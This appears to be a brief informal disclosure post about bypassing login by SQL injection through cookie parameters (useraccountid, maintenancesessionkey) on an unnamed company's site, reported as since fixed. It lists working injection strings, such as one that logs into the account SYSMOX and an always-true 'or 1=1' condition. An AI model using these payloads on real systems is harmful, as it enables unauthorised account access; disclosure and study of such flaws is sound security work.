Skip the password using SQL Injection in cookies .
SQL Injection via cookies gives an attacker the ability to exploit using cookie parameter .
useraccountid= [sql injection]
Example1: useraccountid= x’ or username=’SYSMOX’#
*log on to account SYSMOX
Example2: useraccountid= x’ or 1=1#
useraccountid= x’ or username like ‘%25com’
In 2009 the twitter dns company got hacked some people think that twitter dns password got brute forced; or web application security flaws .
Attacker can inject via cooke :
maintenancesessionkey= [sql injection]
Example1: maintenancesessionkey= x’ or username=’ xxxx.com’
We contacted the company and the bug was fixed